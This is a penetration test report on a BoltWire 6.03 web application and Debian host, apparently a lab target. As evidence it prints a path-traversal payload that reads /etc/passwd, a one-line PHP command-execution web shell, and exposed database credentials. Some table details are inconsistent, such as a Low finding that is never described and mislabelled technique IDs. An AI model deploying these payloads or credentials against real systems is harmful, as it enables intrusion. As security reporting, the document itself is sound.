Date: August 13, 2024
Pentester: Eno Leriand
- Report Overview
- Observations
- Testing Methodology
- Technical Findings
- 4.1 Critical Vulnerability: Local File Inclusion (LFI) in BoltWire
- 4.2 Critical Vulnerability: File Upload Vulnerability in BoltWire
- 4.3 High Vulnerability: Weak SSH Configuration
- 4.4 Medium Vulnerability: Exposed Configuration Files
- 4.5 Medium Vulnerability: Exposed Directory Indexing
- 4.6 Summary of Technical Findings
- Conclusion
- Appendices
This report provides a detailed overview of the penetration test conducted on the target system 192.168.8.4. Critical vulnerabilities such as Local File Inclusion (LFI) and File Upload flaws were discovered, potentially allowing full system compromise. The recommendations outlined in this report are crucial to enhance the security posture of the system.
The engagement was conducted on August 13, 2024, focusing on evaluating the security of the target system through a black box testing approach. Key goals included identifying security weaknesses, assessing their impact, and providing actionable remediation.
The scope was limited to the IP range of 192.168.8.4, with a focus on external network penetration testing. The systems tested include a Linux server (Debian) and the BoltWire web application.
This section provides a high-level overview of the security posture of the target system. A detailed list of all discovered vulnerabilities can be found in Section 4.
- Critical: Update BoltWire and secure file uploads to prevent code execution.
- High: Improve SSH configurations by disabling password authentication and using key-based methods.
- Medium: Restrict access to sensitive configuration files and disable directory indexing.
The target system demonstrated the implementation of SSL/TLS encryption and basic access controls, which mitigated some potential attack vectors.
The following table provides a summary of compliance considerations identified during the engagement:
| Compliance Standard | Requirement | Violation | Reference |
|---|---|---|---|
| PCI DSS | 1.1.4 Firewall Configuration | Firewall not implemented at every internet connection. | Section 4.1.1, 4.2.1 |
| PCI DSS | 2.1 Remove Default Accounts | Default accounts were not removed from all systems on the network. | Section 4.1.1, 4.2.1 |
| PCI DSS | 2.2 Secure Configuration | Insecure configurations found, lacking documentation and best practices. | Section 4.1.1, 4.2.1 |
| NIST SP 800-53 | AC-2 Account Management | Improper management of user accounts and privileges. | Section 4.1.1, 4.2.1 |
| NIST SP 800-53 | SC-7 Boundary Protection | Lack of proper network segmentation and boundary protection. | Section 4.1.1, 4.2.1 |
| GDPR | Article 32 Security of Processing | Exposed sensitive data due to misconfigured access controls. | Section 4.3.1 |
The Penetration Testing Execution Standard (PTES) was referenced throughout the engagement to ensure a comprehensive and standardized approach to the penetration test. PTES defines a structured methodology that covers all aspects of a penetration test, from pre-engagement interactions to reporting.
The PTES framework consists of the following seven phases:
-
Pre-engagement Interactions
Initial discussions with the client to define the scope, objectives, and constraints of the penetration test. This phase ensures both parties understand the engagement's goals and boundaries. -
Intelligence Gathering
Collecting information about the target environment through passive reconnaissance. This may include gathering details about network infrastructure, public-facing systems, and technologies in use. -
Threat Modeling
Analyzing the gathered intelligence to identify potential attack vectors. This phase helps prioritize targets and tailor the attack plan based on the client's risk profile. -
Vulnerability Analysis
Identifying vulnerabilities in the target environment using automated tools and manual testing techniques. This phase involves scanning for open ports, misconfigurations, outdated software, and other potential weaknesses. -
Exploitation
Attempting to exploit identified vulnerabilities to gain unauthorized access or escalate privileges within the target environment. This phase focuses on demonstrating the impact of vulnerabilities by executing controlled attacks. -
Post-Exploitation
Assessing the value of the compromised systems and gathering additional information that may lead to further exploitation. This phase is crucial for understanding the extent of the compromise and potential impacts. -
Reporting
Documenting the findings, methodologies, and remediation recommendations. The final report is delivered to the client, summarizing the engagement and providing actionable steps to mitigate identified risks.
MITRE ATT&CK is a knowledge base of Tactics, Techniques, and Procedures (TTPs) based on real-world observations from cybersecurity professionals. The framework categorizes adversary behaviors across different stages of an attack, providing a structured way to understand and defend against various threats. It is widely used for threat modeling, detection, and incident response.
| Tactic | Technique | Description |
|---|---|---|
| Initial Access | T1078 - Valid Accounts | Adversaries may use valid accounts to gain access to resources or systems. |
| Execution | T1059.003 - Command and Scripting Interpreter: PHP | Use of PHP scripts to execute arbitrary commands on a web server. |
| Persistence | T1098 - Account Manipulation | Adversaries may modify accounts to maintain access to a system. |
| Privilege Escalation | T1068 - Exploitation for Privilege Escalation | Exploiting a vulnerability to gain higher-level privileges. |
| Defense Evasion | T1070 - Indicator Removal on Host | Clearing logs or artifacts to avoid detection. |
| Credential Access | T1552.001 - Unsecured Credentials: Credentials in Files | Stealing credentials stored in files on a compromised system. |
| Discovery | T1083 - File and Directory Discovery | Adversaries may search for files and directories that contain valuable data. |
| Lateral Movement | T1021 - Remote Services | Using remote services to move laterally through a network. |
| Collection | T1114 - Email Collection | Collecting emails from a compromised user or system. |
| Command and Control | T1071 - Application Layer Protocol | Using standard application layer protocols for command and control. |
| Exfiltration | T1041 - Exfiltration Over C2 Channel | Exfiltrating data through an established command and control channel. |
| Impact | T1486 - Data Encrypted for Impact | Encrypting data to disrupt operations or extort payment. |
Referenced in this report is the OWASP Top 10, focusing on common vulnerabilities that pose significant risks to web applications:
| OWASP Top 10 Category | Description |
|---|---|
| 1. Broken Access Controls | Improper enforcement of access controls. |
| 2. Cryptographic Failures | Inadequate protection of data. |
| 3. Injection | Injection flaws such as SQL, NoSQL, Command Injection. |
| 4. Insecure Design | Design flaws leading to security weaknesses. |
| 5. Security Misconfiguration | Insecure configuration of systems and applications. |
| 6. Vulnerable and Outdated Components | Use of components with known vulnerabilities. |
| 7. Identification and Authentication Failures | Weak authentication mechanisms. |
| 8. Software and Data Integrity Failures | Failures in ensuring software/data integrity. |
| 9. Security Logging and Monitoring Failures | Inadequate logging/monitoring. |
| 10. Server-Side Request Forgery (SSRF) | Server-Side Request Forgery vulnerabilities. |
The test included an assessment of PCI DSS compliance to identify areas requiring improvement to protect cardholder data.
Control measures were evaluated against NIST SP 800-53 guidelines, addressing risk management and information protection.
| NIST 800-53 Control Family | Description |
|---|---|
| AC: Access Control | Controls related to restricting access to information. |
| AU: Audit and Accountability | Controls for logging and monitoring activities. |
| CM: Configuration Management | Controls for managing system configurations. |
| IR: Incident Response | Controls for preparing and responding to security incidents. |
This section provides an overview of the vulnerabilities discovered during the penetration test, categorized by their risk level. The risk levels were calculated using the Common Vulnerability Scoring System (CVSS).
| Severity Level | Low | Medium | High | Critical |
|---|---|---|---|---|
| Vulnerability Count | 1 | 2 | 1 | 2 |
The following table breaks down the discovered vulnerabilities by their overall risk score, impact, and exploitability. The scores were calculated using the CVSS v3.1 calculator.
| Vulnerability | Overall Risk Score | Impact | Exploitability |
|---|---|---|---|
| Local File Inclusion (LFI) in BoltWire | 9.3 | 9.0 | 10 |
| File Upload Vulnerability in BoltWire | 9.8 | 9.5 | 10 |
| Weak SSH Configuration | 7.5 | 7.0 | 8.5 |
| Exposed Configuration Files | 5.5 | 5.0 | 6.0 |
| Exposed Directory Indexing | 5.0 | 4.5 | 5.5 |
- Description: BoltWire Version 6.03 on the target system contains a Local File Inclusion (LFI) vulnerability that allows an attacker to include local files on the server.
- Evidence:
Access to the/etc/passwdfile was successfully achieved using the payload../../../../../../../etc/passwdvia theindex.php?p=action.search&action=parameter. - Severity Level: Critical
- CVSS Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
- MITRE ATT&CK Mapping: T1005 - Data from Local System
- Impact: Exploiting this vulnerability could allow an attacker to access sensitive system files, leading to further system compromise.
- Recommendation:
- Update BoltWire to the latest version that addresses this vulnerability.
- Implement strict input validation to prevent similar attacks.
- References:
- OWASP: Local File Inclusion (LFI)
- MITRE ATT&CK: Data from Local System (T1005)
- Description: The file upload function on the page
http://192.168.8.4:8080/dev/index.php?p=action.search&action=createcontains a vulnerability that allows an attacker to upload and execute a PHP shell. - Evidence:
A simple PHP shell was successfully uploaded and used to execute commands:The shell was accessed via the following URL:<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
http://192.168.8.4/shell.php?cmd=whoami - Severity Level: Critical
- CVSS Score: 9.8 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
- MITRE ATT&CK Mapping: T1059.003 - Command and Scripting Interpreter: PHP
- Impact: This vulnerability allows an attacker to execute arbitrary commands on the server, potentially leading to full control over the system.
- Recommendation:
- Update BoltWire to close this vulnerability.
- Ensure proper file upload validation is implemented to prevent the upload of malicious files.
- References:
- OWASP: Unrestricted File Upload
- MITRE ATT&CK: Command and Scripting Interpreter: PHP (T1059.003)
- Description: The SSH configuration was found to use weak algorithms and has password authentication enabled, making the system vulnerable to brute force attacks.
- Evidence:
SSH was configured with the weak SHA1-HMAC algorithm, and password authentication was enabled. - Severity Level: High
- CVSS Score: 7.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
- MITRE ATT&CK Mapping: T1110.001 - Brute Force: Password Guessing
- Impact: An attacker could perform brute force attacks to gain SSH access, particularly if weak passwords are used.
- Recommendation:
- Disable password authentication and enforce key-based authentication.
- Remove weak algorithms like SHA1-HMAC from the SSH configuration.
- Patch or upgrade OpenSSH to address vulnerabilities such as CVE-2023-48795.
- References:
- NIST SP 800-123: Guide to General Server Security
- MITRE ATT&CK: Brute Force: Password Guessing (T1110.001)
- Description: The
.gitignoreandconfig.ymlfiles were found to be exposed on the server, containing sensitive information such as database credentials. - Evidence:
The.gitignorefile was accessible athttp://192.168.8.4/.gitignore, referencing the sensitive configuration fileconfig.ymlwith credentials:- Username:
bolt - Password:
I_love_java
- Username:
- Severity Level: Medium
- CVSS Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
- MITRE ATT&CK Mapping: T1552.001 - Unsecured Credentials: Credentials in Files
- Impact: These credentials could be used by an attacker to gain unauthorized access to the database, compromising sensitive information.
- Recommendation:
- Restrict access to sensitive configuration files.
- Immediately change any exposed credentials to prevent unauthorized access.
- Implement proper access control mechanisms to prevent unauthorized access to configuration files in the future.
- References:
- OWASP: Sensitive Data Exposure
- MITRE ATT&CK: Unsecured Credentials: Credentials in Files (T1552.001)
- Description: Directory indexing is enabled at
http://192.168.8.4:8080/dev/pages/, allowing an attacker to browse and access files within the directory. - Evidence:
Files such asmember.adminandsite.linkrotwere visible within the indexed directory. - Severity Level: Medium
- CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
- MITRE ATT&CK Mapping: T1552.002 - Unsecured Credentials: Directory Listing
- Impact: Exposed files could provide an attacker with additional information about the server's structure and potentially sensitive data.
- Recommendation:
- Disable directory indexing to prevent unauthorized browsing of directories.
- Implement a review process to ensure that directory indexing is disabled across all relevant directories on the server.
- References:
- OWASP: Directory Listing
- MITRE ATT&CK: Unsecured Credentials: Directory Listing (T1552.002)
The penetration test on IP 192.168.8.4 uncovered multiple critical vulnerabilities, including Local File Inclusion (LFI) and File Upload vulnerabilities in BoltWire, as well as weak SSH configurations and exposed sensitive files. These vulnerabilities pose significant risks, including unauthorized access, data leakage, and potential full system compromise. Immediate action is required to remediate these issues, with a prioritized plan to address the most severe vulnerabilities first. Following the recommendations and remediation plan provided in this report will help secure the system against potential exploitation and ensure compliance with relevant security standards.
Given the critical nature of some of the identified vulnerabilities, especially those related to the BoltWire application and SSH configuration, it is crucial that remediation efforts are initiated immediately to prevent potential exploitation.
Appendix A: Nmap Scan Output
Below is a summary of the Nmap scan results:
- Command Used:
nmap -sV -p 22,80,8080 192.168.8.4 - Output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
8080/tcp open http Apache httpd 2.4.38 ((Debian))
Appendix B: Nuclei Scan Output
Below is a summary of the Nuclei scan results:
- Command Used:
nuclei -u http://192.168.8.4 -t vulnerabilities/
| Vulnerability | Details | Risk Level | CVSS Score |
|---|---|---|---|
| Exposed Sensitive Files | composer.json, .gitignore, README.md accessible via HTTP |
Medium | 5.3 |
| Apache Version Disclosure | Apache version detected as 2.4.38 (Debian) | Information Disclosure | 5.0 |
| Weak SSH Configuration | Password authentication enabled, weak SHA1-HMAC algorithm, vulnerable to CVE-2023-48795 | High | 7.5 |
Appendix C: Exposed Sensitive Files
The following sensitive files were identified as being exposed on the server:
.gitignoreathttp://192.168.8.4/.gitignoreconfig.ymlcontaining database credentialscomposer.jsonandREADME.md
Appendix D: Attack Scenarios
This appendix contains detailed descriptions of potential attack scenarios for each of the identified vulnerabilities, illustrating how an attacker might exploit them and the impact they could have.
-
LFI Attack Scenario:
An attacker could exploit the LFI vulnerability in BoltWire by including files such as/etc/passwd, leading to potential privilege escalation and unauthorized access. -
File Upload Exploitation:
By uploading a malicious PHP shell, the attacker could gain remote code execution, allowing them to execute arbitrary commands and potentially compromise the entire server. -
Weak SSH Configuration Attack:
Through brute force attacks leveraging the weak SSH configuration, an attacker could gain unauthorized access, leading to full control over the affected system.
Appendix E: References to Relevant Security Documentation
- OWASP Sensitive Data Exposure: Best practices to prevent exposure of sensitive data. OWASP Sensitive Data Exposure
- MITRE ATT&CK Framework: A knowledge base of adversary tactics and techniques. MITRE ATT&CK
- PCI DSS Requirements: Security guidelines for processing payment card data. PCI DSS
- NIST Special Publication 800-53: Security and Privacy Controls for Federal Information Systems and Organizations. NIST SP 800-53
Appendix F: Tools Used
This appendix lists the tools used during the penetration test:
| Tool | Description | Link |
|---|---|---|
| Nmap | Network and vulnerability scanner | Nmap |
| Metasploit | Exploitation framework | Metasploit |
| DIRB | Directory Brute Force Tool | DIRB |
| Gobuster | Directory Brute Force Tool | Gobuster |
| Hydra | Brute Forcing tool | Hydra |
| Wireshark | Network traffic analyzer | Wireshark |
| Burp Suite | Web traffic analysis tool | Burp Suite |
| psql | PostgreSQL interactive terminal | PostgreSQL |